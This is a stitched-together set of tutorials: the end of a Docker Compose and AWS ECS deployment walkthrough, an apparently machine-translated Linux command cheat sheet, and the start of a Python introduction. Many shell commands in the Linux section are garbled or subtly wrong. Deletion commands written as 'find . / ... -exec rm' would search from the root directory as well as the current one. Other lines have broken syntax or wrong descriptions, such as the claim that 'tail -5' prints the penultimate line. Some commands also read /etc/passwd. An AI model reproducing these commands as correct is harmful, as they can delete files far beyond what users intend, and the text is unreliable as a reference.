      - esdata1:/usr/share/elasticsearch/data
  web:
    build: . # replaced image with build
    command: python3 app.py
    environment:
      - DEBUG=True # set an env var for flask
    depends_on:
      - es
    ports:
      - "5000:5000"
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local

With that change (diff), let's stop and start the containers.

$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es               ... done
Removing foodtrucks_web_1 ... done
Removing es               ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1

$ docker-compose up -d
Creating network "foodtrucks_default" with the default driver
Creating volume "foodtrucks_esdata1" with local driver
Creating es ... done
Creating foodtrucks_web_1 ... done

As a final step, lets make the change in app.py by adding a new route. Now we try to curl

$ curl 0.0.0.0:5000/hello
hello world

Wohoo! We get a valid response! Try playing around by making more changes in the app.

That concludes our tour of Docker Compose. With Docker Compose, you can also pause your services, run a one-off command on a container and even scale the number of containers. I also recommend you checkout a few other use-cases of Docker compose. Hopefully, I was able to show you how easy it is to manage multi-container environments with Compose. In the final section, we are going to deploy our app to AWS!

AWS Elastic Container Service

In the last section we used docker-compose to run our app locally with a single command: docker-compose up. Now that we have a functioning app we want to share this with the world, get some users, make tons of money and buy a big house in Miami. Executing the last three are beyond the scope of the tutorial, so we'll spend our time instead on figuring out how we can deploy our multi-container apps on the cloud with AWS.

If you've read this far you are pretty much convinced that Docker is a pretty cool technology. And you are not alone. Seeing the meteoric rise of Docker, almost all Cloud vendors started working on adding support for deploying Docker apps on their platform. As of today, you can deploy containers on Google Cloud Platform, AWS, Azure and many others. We already got a primer on deploying single container apps with Elastic Beanstalk and in this section we are going to look at Elastic Container Service (or ECS) by AWS.

AWS ECS is a scalable and super flexible container management service that supports Docker containers. It allows you to operate a Docker cluster on top of EC2 instances via an easy-to-use API. Where Beanstalk came with reasonable defaults, ECS allows you to completely tune your environment as per your needs. This makes ECS, in my opinion, quite complex to get started with.

Luckily for us, ECS has a friendly CLI tool that understands Docker Compose files and automatically provisions the cluster on ECS! Since we already have a functioning docker-compose.yml it should not take a lot of effort in getting up and running on AWS. So let's get started!

The first step is to install the CLI. Instructions to install the CLI on both Mac and Linux are explained very clearly in the official docs. Go ahead, install the CLI and when you are done, verify the install by running

$ ecs-cli --version
ecs-cli version 1.18.1 (7e9df84)

Next, we'll be working on configuring the CLI so that we can talk to ECS. We'll be following the steps as detailed in the official guide on AWS ECS docs. In case of any confusion, please feel free to refer to that guide.

The first step will involve creating a profile that we'll use for the rest of the tutorial. To continue, you'll need your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. To obtain these, follow the steps as detailed under the section titled Access Key and Secret Access Key on this page.

$ ecs-cli configure profile --profile-name ecs-foodtrucks --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY

Next, we need to get a keypair which we'll be using to log into the instances. Head over to your EC2 Console and create a new keypair. Download the keypair and store it in a safe location. Another thing to note before you move away from this screen is the region name. In my case, I have named my key - ecs and set my region as us-east-1. This is what I'll assume for the rest of this walkthrough.

EC2 Keypair

The next step is to configure the CLI.

$ ecs-cli configure --region us-east-1 --cluster foodtrucks
INFO[0000] Saved ECS CLI configuration for cluster (foodtrucks)

We provide the configure command with the region name we want our cluster to reside in and a cluster name. Make sure you provide the same region name that you used when creating the keypair. If you've not configured the AWS CLI on your computer before, you can use the official guide, which explains everything in great detail on how to get everything going.

The next step enables the CLI to create a CloudFormation template.

$ ecs-cli up --keypair ecs --capability-iam --size 1 --instance-type t2.medium
INFO[0000] Using recommended Amazon Linux 2 AMI with ECS Agent 1.39.0 and Docker version 18.09.9-ce
INFO[0000] Created cluster                               cluster=foodtrucks
INFO[0001] Waiting for your cluster resources to be created
INFO[0001] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0062] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0122] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0182] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0242] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
VPC created: vpc-0bbed8536930053a6
Security Group created: sg-0cf767fb4d01a3f99
Subnet created: subnet-05de1db2cb1a50ab8
Subnet created: subnet-01e1e8bc95d49d0fd
Cluster creation succeeded.

Here we provide the name of the keypair we downloaded initially (ecs in my case), the number of instances that we want to use (--size) and the type of instances that we want the containers to run on. The --capability-iam flag tells the CLI that we acknowledge that this command may create IAM resources.

The last and final step is where we'll use our docker-compose.yml file. We'll need to make a few minor changes, so instead of modifying the original, let's make a copy of it. The contents of this file (after making the changes) look like (below) -

version: '2'
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.6.2
    cpu_shares: 100
    mem_limit: 3621440000
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: es
  web:
    image: yourusername/foodtrucks-web
    cpu_shares: 100
    mem_limit: 262144000
    ports:
      - "80:5000"
    links:
      - es
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: web

The only changes we made from the original docker-compose.yml are of providing the mem_limit (in bytes) and cpu_shares values for each container and adding some logging configuration. This allows us to view logs generated by our containers in AWS CloudWatch. Head over to CloudWatch to create a log group called foodtrucks. Note that since ElasticSearch typically ends up taking more memory, we've given around 3.4 GB of memory limit. Another thing we need to do before we move onto the next step is to publish our image on Docker Hub.

$ docker push yourusername/foodtrucks-web

Great! Now let's run the final command that will deploy our app on ECS!

$ cd aws-ecs
$ ecs-cli compose up
INFO[0000] Using ECS task definition                     TaskDefinition=ecscompose-foodtrucks:2
INFO[0000] Starting container...                         container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es
INFO[0000] Starting container...                         container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web
INFO[0000] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0000] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0036] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container...                          container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container...                          container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2

It's not a coincidence that the invocation above looks similar to the one we used with Docker Compose. If everything went well, you should see a desiredStatus=RUNNING lastStatus=RUNNING as the last line.

Awesome! Our app is live, but how can we access it?

ecs-cli ps
Name                                      State    Ports                     TaskDefinition
845e2368-170d-44a7-bf9f-84c7fcd9ae29/web  RUNNING  54.86.14.14:80->5000/tcp  ecscompose-foodtrucks:2
845e2368-170d-44a7-bf9f-84c7fcd9ae29/es   RUNNING                            ecscompose-foodtrucks:2

Go ahead and open http://54.86.14.14 in your browser and you should see the Food Trucks in all its black-yellow glory! Since we're on the topic, let's see how our AWS ECS console looks.

Cluster

Tasks

We can see above that our ECS cluster called 'foodtrucks' was created and is now running 1 task with 2 container instances. Spend some time browsing this console to get a hang of all the options that are here.

Cleanup

Once you've played around with the deployed app, remember to turn down the cluster -

$ ecs-cli down --force
INFO[0001] Waiting for your cluster resources to be deleted...
INFO[0001] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0062] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0124] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0155] Deleted cluster                               cluster=foodtrucks

So there you have it. With just a few commands we were able to deploy our awesome app on the AWS cloud!

CONCLUSION

And that's a wrap! After a long, exhaustive but fun tutorial you are now ready to take the container world by storm! If you followed along till the very end then you should definitely be proud of yourself. You learned how to setup Docker, run your own containers, play with static and dynamic websites and most importantly got hands on experience with deploying your applications to the cloud!

I hope that finishing this tutorial makes you more confident in your abilities to deal with servers. When you have an idea of building your next app, you can be sure that you'll be able to get it in front of people with minimal effort.

Next Steps

Your journey into the container world has just started! My goal with this tutorial was to whet your appetite and show you the power of Docker. In the sea of new technology, it can be hard to navigate the waters alone and tutorials such as this one can provide a helping hand. This is the Docker tutorial I wish I had when I was starting out. Hopefully, it served its purpose of getting you excited about containers so that you no longer have to watch the action from the sides.

Below are a few additional resources that will be beneficial. For your next project, I strongly encourage you to use Docker. Keep in mind - practice makes perfect!

Additional Resources

Off you go, young padawan!

Give Feedback

Now that the tutorial is over, it's my turn to ask questions. How did you like the tutorial? Did you find the tutorial to be a complete mess or did you have fun and learn something?

Send in your thoughts directly to me or just create an issue. I'm on Twitter, too, so if that's your deal, feel free to holler there!

I would totally love to hear about your experience with this tutorial. Give suggestions on how to make this better or let me know about my mistakes. I want this tutorial to be one of the best introductory tutorials on the web and I can't do it without your help.

Linux OS Installation and Basics

https://linuxtools-rst.readthedocs.io/zh_CN/latest/base/index.html

https://www.tutorialspoint.com/unix/index.htm

https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-basics

What is Unix ?

The Unix operating system is a set of programs that act as a link between the computer and the user.

The computer programs that allocate the system resources and coordinate all the details of the computer's internals are called the operating system or the kernel.

Users communicate with the kernel through a program known as the shell. The shell is a command line interpreter; it translates commands entered by the user and converts them into a language that is understood by the kernel.

Unix was originally developed in 1969 by a group of AT&T employees Ken Thompson, Dennis Ritchie, Douglas McIlroy, and Joe Ossanna at Bell Labs.
There are various Unix variants available in the market. Solaris Unix, AIX, HP Unix, and BSD are a few examples. Linux is also a freely available flavor of Unix.
Several people can use a Unix computer at the same time; hence Unix is called a multiuser system.
A user can also run multiple programs at the same time; hence Unix is a multitasking environment.

Prerequisites

To follow along with this guide, you will need access to a computer running a Linux-based operating system. This can either be a virtual private server that you’ve connected to with SSH or your local machine. Note that this tutorial was validated using a Linux server running Ubuntu 20.04, but the examples given should work on a computer running any version of any Linux distribution.

If you plan to use a remote server to follow this guide, we encourage you to first complete our Initial Server Setup guide. Doing so will set you up with a secure server environment — including a non-root user with sudo privileges and a firewall configured with UFW — which you can use to build your Linux skills.

The Terminal

The terms “terminal,” “shell,” and “command line interface” are often used interchangeably, but there are subtle differences between them:

A terminal is an input and output environment that presents a text-only window running a shell.
A shell is a program that exposes the computer’s operating system to a user or program. In Linux systems, the shell presented in a terminal is a command line interpreter.
A command line interface is a user interface (managed by a command line interpreter program) that processes commands to a computer program and outputs the results.

When someone refers to one of these three terms in the context of Linux, they generally mean a terminal environment where you can run commands and see the results printed out to the terminal, such as this:

Terminal window example

Becoming a Linux expert requires you to be comfortable with using a terminal. Any administrative task, including file manipulation, package installation, and user management, can be accomplished through the terminal. The terminal is interactive: you specify commands to run and the terminal outputs the results of those commands. To execute any command, you type it into the prompt and press ENTER.

When accessing a cloud server, you’ll most often be doing so through a terminal shell. Although personal computers that run Linux often come with the kind of graphical desktop environment familiar to most computer users, it is often more efficient or practical to perform certain tasks through commands entered into the terminal.

Learn to use command help

Overview

In the linux terminal, when we don't know how to use a command, or don't remember the spelling of a command or its parameters, we need to turn to the system's help documentation; the built-in help documentation in linux is very detailed and usually solves our problems, so we need to know how to use it properly.

in cases where we only remember some of the command keywords, we can search for them by using man -k.
needing a brief description of a command, we can use what is; for a more detailed description, we can use the info command.
to see where the command is located, we need to use which.
and for the specific parameters of a command and how to use it, we need to use the powerful man.

These commands are described below.

Command usage

View a brief description of the command

A brief description of what the command does (showing the man category page where the command is located):

$whatis command

Regular match:

$whatis -w "loca*"

Using man

Query the documentation for the command command:

$man command
eg: man date

Using page up and page down to page up and down

In the man help manual, the help documentation is divided into 9 categories, for some keywords that may exist in more than one category, we need to specify a specific category to view; (generally, we query the bash command, categorized in category 1).

man page belongs to the category identification (commonly used is category 1 and category 3)

(1), the user can operate the command or executable file
(2), the core of the system can be called functions and tools, etc.
(3), some common functions and databases
(4), the description of the device file
(5), the format of the settings file or some files
(6), games
(7), conventions and protocols, etc. For example, the Linux standard file system, network protocols, ASCII, code and other descriptions of the content
(8), the system administrator available to manage the order
(9), and kernel-related files

As mentioned earlier using whatis will show the specific document category where the command is located, we learn how to use it

eg:
$whatis printf
printf (1) - format and print data
printf (1p) - write formatted output
printf (3) - formatted output conversion
printf (3p) - print formatted output
printf [builtins] (1) - bash built-in commands, see bash(1)

We see that printf is available in both category 1 and category 3; the pages in category 1 are for help on command operations and executables; while 3 is for instructions on commonly used libraries; if we want to see the use of printf in C, we can specify to see the help in category 3:

$man 3 printf

$man -k keyword

query keyword Query commands based on some of the keywords in the command, for occasions when only part of the command is remembered.

eg: Find GNOME's config tool command:

$man -k GNOME config| grep 1

For a word search, you can use /word directly to use: /-a; pay more attention to SEE ALSO to see more exciting content

Checking paths

Check the path to the program's binary file:

$which command

eg: Find the path where the make program is installed:

$which make
/opt/app/openav/soft/bin/make install

Check the search path of the program:

$whereis command

This command comes in handy when there are multiple versions of the same software installed on the system and you are not sure which version is being used.

File and directory management

Create and delete

Create: mkdir
Delete: rm
Delete non-empty directories: rm -rf file directory
Delete log rm *log (Equivalent: $find . / -name "*log" -exec rm {} ;)
Move: mv
Copy: cp (Copy directory: cp -r )

View the number of files in the current directory:

$find . / | wc -l

Copy the directory:

$cp -r source_dir dest_dir

Directory switching

Find the file/directory location: cd
Switch to the previous working directory: cd -
Switch to the home directory: cd or cd ~
Show current path: pwd
Change the current working path to path: $cd path

List directory entries

Display the files in the current directory ls
Show directory entries as a list, sorted by time ls -lrt

The above command is used so often that we need to create a shortcut for it:

Set the command alias in .bashrc:

alias lsl='ls -lrt'
alias lm='ls -al|more'

so that, using lsl, the files in the directory can be displayed sorted by modification time; in a list.

Add an id number to the front of each file (for a neater look):

> ls | cat -n

> 1 a 2 a.out 3 app 4 b 5 bin 6 config

Note: .bashrc is stored as a hidden file under the /home/your username/ folder; you can check it with ls -a.

Find directories and files find/locate

Search for a file or directory:

$find . / -name "core*" | xargs file

Find if there is an obj file in the target folder:

$find . / -name '*.o'

Recursively delete all .o files in the current directory and subdirectories:

$find . / -name "*.o" -exec rm {} \;

find is a real-time lookup, if you need a faster query, try locate; locate will create an index database for the file system, if there are file updates, you need to execute the update command periodically to update the index database:

$locate string

Find paths that contain string:

$updatedb

Unlike find, locate is not a real-time lookup. You need to update the database to get the latest file index information.

View file contents

To view the file: cat vi head tail more

Display the file with the line number:

$cat -n

Show list contents by page:

$ls -al | more

See only the first 10 lines:

$head - 10 **

Show the first line of the file:

$head -1 filename

Show the penultimate line of the file:

$tail -5 filename

See the difference between the two files:

$diff file1 file2

Dynamically display the latest information in the text:

$tail -f crawler.log

Find the contents of a file

Use egrep to query the contents of a file:

egrep '03.1\/CO\/AE' TSF_STAT_111130.log.012
egrep 'A_LMCA777:C' TSF_STAT_111130.log.035 > co.out2

File and directory permission modification

Change the owner of a file chown
Change file read, write, execute, etc. attributes chmod
Recursive subdirectory modification: chown -R tuxapp source/
Add script executable permissions: chmod a+x myscript

Add aliases to files

Create symbolic/hard links:

ln cc ccAgain :hard link; delete one, will still be found.
ln -s cc ccTo :symbolic link (soft link); delete the source, the other will not be available; (the latter ccTo is a newly created file)

Pipelines and Redirects

Batch command concatenation execution, using |
Concatenation: use semicolon ;
If the previous one succeeds, the next one is executed, otherwise, it is not executed :&&
If the first one fails, the next one is executed: ||

ls /proc && echo suss! || echo failed.

The ability to indicate whether the named execution succeeded OR failed.

The same effect as above is :

if ls /proc; then echo suss; else echo failed; fi

Redirect:

ls proc/*.c > list 2> &l Redirects standard output and standard errors to the same file.

The equivalent is :

ls proc/*.c &> list

Clear the file:

:> a.txt

Redirect:

echo aa >> a.txt

Setting environment variables

automatically executed after starting the account is the file .profile, through which you can then set your own environment variables.

The path of the installed software usually needs to be added to the path:

PATH=$APPDIR:/opt/app/soft/bin:$PATH:/usr/local/bin:$TUXDIR/bin:$ORACLE_HOME/bin;export PATH

Bash shortcut input or delete

Shortcut keys:

Ctl-U deletes all characters from the cursor to the beginning of the line, and in some settings, the entire line
Ctl-W deletes the characters between the current cursor and the nearest preceding space
Ctl-H backspace, delete the character in front of the cursor
Ctl-R match the closest file and output

Integrated Applications

Find the total number of records in record.log that contain AAA, but not BBB:

cat -v record.log | grep AAA | grep -v BBB | wc -l

Text processing

Find file search

find txt and pdf files:

find . \( -name "*.txt" -o -name "*.pdf" \) -print

regular way to find .txt and pdf:

find . -regex ". *\(\.txt|\.pdf\)$"

-iregex: ignore case-sensitive regularity

Negate arguments , find all non-txt text:

find . ! -name "*.txt" -print

Specify the search depth, print out the files in the current directory (depth 1):

find . -maxdepth 1 -type f

Custom search

Search by type

find . -type d -print // list all directories only

-type f files / l symbolic links / d directories

the file search types supported by find can distinguish between ordinary files and symbolic links, directories, etc., but binary and text files cannot be distinguished directly by the types of find

The file command can check the specific type of file (binary or text):

$file redis-cli # binary file
redis-cli: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
$file redis.pid # Text file
redis.pid: ASCII text
redis.pid: ASCII text

So, you can use the following combination of commands to find all the binary files in your local directory:

ls -lrt | awk '{print $9}'|xargs file|grep ELF| awk '{print $1}'|tr -d ':'

Search by time

-atime access time (in days, or -amin in minutes, similar below) -mtime modification time (content was modified) -ctime change time (metadata or permission changes)

All files that have been accessed in the last 7 days:

find . -atime 7 -type f -print

All files that have been accessed in the last 7 days:

find . -atime -7 -type f -print

Search for all files accessed 7 days ago:

find . -atime +7 type f -print

Search by size.

w word k M G Find files larger than 2k:

find . -type f -size +2k

Find by permissions:

find . -type f -perm 644 -print //find all files with executable permissions

Find by user:

find . -type f -user weber -print// Find files owned by user weber

Follow-up actions after finding

Delete

Delete all swp files in the current directory:

find . -type f -name "*.swp" -delete

Another syntax:

find . type f -name "*.swp" | xargs rm

Execute action (powerful exec)

Change the ownership of the current directory to weber:

find . -type f -user root -exec chown weber {} \;

Note: {} is a special string, and for each matching file, {} is replaced with the corresponding filename.

Copy all the files found to another directory:

find . -type f -mtime +10 -name "*.txt" -exec cp {} OLD \;

Combining multiple commands

If you need to execute multiple commands subsequently, you can write multiple commands as one script. Then just execute the script when -exec is called:

-exec . /commands.sh {} \;

-print's delimiter

Use '\n' as the delimiter for the file by default.

-print0 uses '\0' as the file delimiter so that it can search for files containing spaces.

Grep text search

grep match_patten file // default access to matching lines

Common parameters

-o only output matching text lines VS -v only output text lines that do not match

-c counts the number of times the file contains text

grep -c "text" filename

-n Print matching line numbers

-i Ignore case when searching

-l prints only the file name

Recursive search for text in multi-level directories (a favorite of programmers searching for code):

grep "class" . -R -n

Match multiple patterns:

grep -e "class" -e "vitural" file

grep output file names with a 0 as the ending character (-z):

grep "test" file* -lZ| xargs -0 rm

Comprehensive application: find all sql lookups with where conditions in the log:

cat LOG.* | tr a-z A-Z | grep "FROM " | grep "WHERE" > b

find Chinese example: project directory in utf-8 format and gb2312 format two kinds of files, to find the word is Chinese.

find out its utf-8 encoding and gb2312 encoding are E4B8ADE69687 and D6D0CEC4 respectively
query :

   grep: grep -rnP "\xE4\xB8\xAD\xE6\x96\x87|\xD6\xD0\xCE\xC4" * can be

Chinese character code lookup: http://bm.kdd.cc/

Xargs Command Line Parameter Conversion

xargs is able to convert input data into command line arguments for a specific command; in this way, it can be used in combination with many commands. e.g. grep, e.g. find; - Converting multi-line output to single-line output

cat file.txt| xargs

n is a delimiter between multiple lines of text

Convert single line to multi-line output

cat single.txt | xargs -n 3

-n: specifies the number of fields to display per line

Description of xargs parameters

-d defines the delimiter (the default is a space. The delimiter for multiple lines is n) -n specifies that the output is multi-line -I {} specifies the replacement string that will be replaced when xargs is expanded, used when the command to be executed requires multiple arguments -0: specify 0 as input delimiter

Example:

cat file.txt | xargs -I {} . /command.sh -p {} -1

# Count the number of lines in the program
find source_dir/ -type f -name "*.cpp" -print0 |xargs -0 wc -l

#redis stores data by string and indexes by set, and needs to look up all values by index.
. /redis-cli smembers $1 | awk '{print $1}'|xargs -I {} . /redis-cli get {}

Sort

Field Description

-n Sort by number VS -d Sort by dictionary order -r Sort in reverse order -k N specifies sorting by column N

Example:

sort -nrk 1 data.txt
sort -bd data // ignore leading whitespace characters like spaces

Uniq Eliminate duplicate rows

Eliminate duplicate rows

sort unsort.txt | uniq

Count the number of times each row appears in the file

sort unsort.txt | uniq -c

Find duplicate rows

sort unsort.txt | uniq -d

You can specify the duplicates to be compared in each line: -s start position -w number of characters to compare

Converting with tr

General usage

echo 12345 | tr '0-9' '9876543210' // encryption and decryption conversion, replacing the corresponding characters
cat text| tr '\t' ' ' //tab to space conversion

tr delete characters

cat file | tr -d '0-9' // delete all numbers

-c find the complement

cat file | tr -c '0-9' // Get all the numbers in the file
cat file | tr -d -c '0-9 \n' // delete non-numeric data

tr compress characters

tr -s compresses repetitive characters in text; most often used to compress extra spaces:

cat file | tr -s ' '

Character classes
Various character classes are available in tr.

alnum: letters and numbers alpha: letters digit: numbers space: blank characters lower: lowercase upper: uppercase cntrl: control (non-printable) characters print: printable characters

Usage: tr [:class:] [:class:]

tr '[:lower:]' '[:upper:]'

Cut cut text by column

Truncate the second and fourth columns of the file

cut -f2,4 filename

Remove all columns from the file except column 3

cut -f3 --complement filename

-d Specify delimiters

cat -f2 -d";" filename

-cut The range to take

N - Nth field to the end -M 1st field for MN-M N to M fields

The unit to be fetched by cut

-b in bytes -c in characters -f in fields (using delimiters)

Example:

cut -c1-5 file // print first to 5 characters
cut -c-2 file //Print the first 2 characters

Truncate columns 5 to 7 of the text

$echo string | cut -c5-7

Paste Splice text by column

Splices two pieces of text together by column;

cat file1
1
2

cat file2
colin
book

paste file1 file2
1 colin
2 book

The default delimiter is tab, you can use -d to specify the delimiter:

paste file1 file2 -d ","
1,colin
2,book

Wc Tools for counting lines and characters

$wc -l file // count the number of lines

$wc -w file // count the number of words

$wc -c file // count the number of characters

Sed text replacement tool

First substitution

sed 's/text/replace_text/' file // Replace the first matching text on each line

Global replacement

sed 's/text/replace_text/g' file

Default replace, output the replaced content, if you need to replace the original file directly, use -i:

sed -i 's/text/repalce_text/g' file

Remove blank lines

sed '/^$/d' file

Variable conversion

Matched strings are referenced by the & marker.

echo this is en example | sed 's/\w+/[&]/g'
$>[this] [is] [en] [example]

Substring matching tokens

The contents of the first matching bracket are referenced using token 1

sed 's/hello\([0-9]\)/\1/'

Double quotes for values

sed is usually quoted in single quotes; double quotes can also be used, and when used, double quotes will evaluate the expression:

sed 's/$var/HLLOE/'

when using double quotes, we can specify variables in sed style and in replacement strings.

eg:
p=patten
r=replaced
echo "line con a patten" | sed "s/$p/$r/g"
$>line con a replaced

Other examples

String insertion character: converts each line of text (ABCDEF) to ABC/DEF:

sed 's/^. \{3\}/&\/g' file

Awk data stream processing tool

The awk script structure

awk ' BEGIN{ statements } statements2 END{ statements } '

How it works

executing the block of statements in begin.
reads a line from the file or stdin and executes statements2, repeating the process until the file has been read in its entirety.
Execute the end statement block.

print prints the current line

When using print without arguments, the current line is printed

echo -e "line1\nline2" | awk 'BEGIN{print "start"} {print } END{ print "End" }'

print When split by commas, arguments are delimited by spaces;

echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1, var2 , var3; }'
$>v1 V2 v3

Using the -splicer approach ("" as a splice character) ;

echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1"-"var2"-"var3; }'
$>v1-V2-v3

Special variables: NR NF $0 $1 $2

NR:indicates the number of records, corresponding to the line number that should precede it during execution.

NF:indicates the number of fields, which always pairs up with the number of fields that should go forward during execution.

$0:this variable contains the text content of the current line during execution.

$1:the text content of the first field.

$2:the text content of the second field.

echo -e "line1 f2 f3 \n line2 \n line 3" | awk '{print NR":"$0"-"$1"-"$2}'

Print the second and third fields of each line

awk '{print $2, $3}' file

Count the number of lines in the file

awk ' END {print NR}' file

Accumulate the first field of each line

echo -e "1\n 2\n 3\n 4\n" | awk 'BEGIN{num = 0 ;
print "begin";} {sum += $1;} END {print "=="; print sum }'

Passing external variables

var=1000
echo | awk '{print vara}' vara=$var # Input from stdin
awk '{print vara}' vara=$var file # Input from file

Filter the lines processed by awk with the style

awk 'NR < 5' # line number less than 5
awk 'NR == 1,NR == 4 {print}' file # Print out line numbers equal to 1 and 4
awk '/linux/' # lines containing linux text (can be specified with regular expressions, super powerful)
awk '! /linux/' # lines that do not contain linux text

Set delimiters

Use -F to set delimiters (default is spaces):

awk -F: '{print $NF}' /etc/passwd

Read command output

Use getline to read the output of an external shell command into the variable cmdout:

echo | awk '{"grep root /etc/passwd" | getline cmdout; print cmdout }'

Using loops in awk

for(i=0;i<10;i++){print $i;}
for(i in array){print array[i];}

eg:The following string, print out the time string:

2015_04_02 20:20:08: mysqli connect failed, please check connect info
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F ":" '{ for(i=1;i<=;i++) printf("%s:",$i)}'
>2015_04_02 20:20:08: # This way will print the last colon
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; }'
>2015_04_02 20:20:08 # This way satisfies the requirement

And if you need to print out the later part as well (the time part is printed separately from the later text) :

$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; print $4;}'
>2015_04_02 20:20:08
>mysqli connect failed, please check connect info

Print the rows in reverse order: (implementation of the tac command):

seq 9| \
awk '{lifo[NR] = $0; lno=NR} \
END{ for(;lno>-1;lno--){print lifo[lno];}
} '

awk combined with grep finds the specified service and kills it

ps -fe| grep msv8 | grep -v MFORWARD | awk '{print $2}' | xargs kill -9;

awk implementation of head and tail commands

head

awk 'NR<=10{print}' filename

tail

awk '{buffer[NR%10] = $0;} END{for(i=0;i<11;i++){ \
print buffer[i %10]} } ' filename

Print the specified column

awk way to implement

ls -lrt | awk '{print $6}'

The cut method

ls -lrt | cut -f6

Print the specified text area

Determine the line number

seq 100| awk 'NR==4,NR==6{print}'

Determine the text

Print the text between start_pattern and end_pattern:

awk '/start_pattern/, /end_pattern/' filename

Example:

seq 100 | awk '/13/,/15/'
cat /etc/passwd| awk '/mai.*mail/,/news.*news/'

awk common built-in functions

index(string,search_string):return the position of search_string in string

sub(regex,replacement_str,string):replace the first regular match with replacement_str;

match(regex,string):check if the regular expression can match the string.

length(string):return the length of the string

echo | awk '{"grep root /etc/passwd" | getline cmdout; print length(cmdout) }'

printf is similar to printf in c, and formats the output:

seq 10 | awk '{printf "->%4s\n", $1}'

Iterate over lines, words and characters in a file

Iterate over each line in the file

while loop method

while read line;
do
echo $line;
done < file.txt

Change to a subshell:
cat file.txt | (while read line;do echo $line;done)

awk method

cat file.txt| awk '{print}'

Iterate over each word in a line

for word in $line;
do
echo $word;
done

Iterate over each character

${string:start_pos:num_of_chars}: extract a character from the string; (bash text slicing)

${#word}:return the length of the variable word

for((i=0;i<${#word};i++))
do
echo ${word:i:1);
done

Display the file in ASCII characters:

$od -c filename

Python Programming Quick Guide - Installation and Basic IO

https://www.liaoxuefeng.com/wiki/1016959663602400

https://www.w3schools.com/python/python_intro.asp

https://docs.python.org/3/

What is Python?

Python is a popular programming language. It was created by Guido van Rossum, and released in 1991.

It is used for:

web development (server-side),
software development,
mathematics,
system scripting.

What can Python do?

Python can be used on a server to create web applications.
Python can be used alongside software to create workflows.
Python can connect to database systems. It can also read and modify files.
Python can be used to handle big data and perform complex mathematics.
Python can be used for rapid prototyping, or for production-ready software development.

Why Python?

Python works on different platforms (Windows, Mac, Linux, Raspberry Pi, etc).
Python has a simple syntax similar to the English language.
Python has a syntax that allows developers to write programs with fewer lines than some other programming languages.
Python runs on an interpreter system, meaning that code can be executed as soon as it is written. This means that prototyping can be very quick.
Python can be treated in a procedural way, an object-oriented way, or a functional way.

Good to know

The most recent major version of Python is Python 3, which we shall be using in this tutorial. However, Python 2, although not being updated with anything other than security updates, is still quite popular.
In this tutorial, Python will be written in a text editor. It is possible to write Python in an Integrated Development Environment, such as Thonny, Pycharm, Netbeans, or Eclipse which are particularly useful when managing larger collections of Python files.

Python Syntax compared to other programming languages

Python was designed for readability, and has some similarities to the English language with influence from mathematics.
Python uses new lines to complete a command, as opposed to other programming languages which often use semicolons or parentheses.
Python relies on indentation, using whitespace, to define scope; such as the scope of loops, functions, and classes. Other programming languages often use curly brackets for this purpose.

Example

print("Hello, World!")

Installing Python

Because Python is cross-platform, it can run on Windows, Mac, and various Linux/Unix systems. Python programs written on Windows are capable of running when put on Linux.

To start learning Python programming, you first have to install Python into your computer. Once installed, you'll get the Python interpreter (which is responsible for running Python programs), a command line interactive environment, and a simple integrated development environment.

Installing Python 3.8

Currently, there are two versions of Python, version 2.x and version 3.x, which are incompatible. Since version 3.x is becoming more and more popular, our tutorial will be based on the latest Python version 3.8. Please make sure that the version of Python installed on your computer is the latest 3.8.x so that you can learn this tutorial painlessly.

Installing Python on a Mac

